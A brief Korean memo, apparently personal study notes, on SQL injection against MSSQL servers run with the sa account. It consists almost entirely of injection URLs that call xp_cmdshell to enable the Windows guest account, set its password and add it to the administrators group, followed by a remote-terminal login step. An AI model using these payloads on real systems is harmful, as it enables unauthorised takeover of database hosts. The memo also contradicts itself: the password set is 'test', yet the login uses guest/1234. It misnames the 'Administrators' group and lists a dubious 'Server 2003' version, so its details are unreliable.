# 취약점 적용 대상
- 데이터베이스 운영자가 MSSQL 서버를 sa 계정으로 운영하는 경우,
- MSSQL Server 2000, 2003, 2005
1. http://victim.com/research?name=';EXEC xp_cmdshell 'net user guest /active:yes'--
--> guest 계정 활성화
2. http://victim.com/research?name=';EXEC xp_cmdshell 'net user guest test'--
--> guest 계정 password를 test로 변경
3. http://victim.com/research?name=';EXEC xp_cmdshell 'net localgroup Administrator guest /add'--
// 관리자 그룹에 guest 추가
4. 원격 터미널을 통해 guest/1234 로그인